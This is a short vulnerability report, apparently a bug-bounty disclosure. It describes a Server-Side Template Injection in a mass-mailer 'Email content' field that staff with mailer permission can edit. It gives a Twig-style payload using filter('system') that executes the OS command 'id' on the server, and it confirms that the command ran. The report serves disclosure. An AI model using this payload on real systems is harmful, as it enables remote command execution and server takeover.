Admin or Staff with “Mass mailer” permission can perform a Server-Side Template Injection attack
Log in as an admin or a staff who has “Mass mailer” permission, edit a message
In the “Email content” field, insert the following value and click “Update and preview”
{% apply markdown %}
Greeting from {{ ['id']|filter('system') }}
Your email is: {{ c.email }}
Order our services at {{ "order"|link }}
{{ guest.system_company.name }}
{% endapply %}
Observed that the command “id” was successfully executed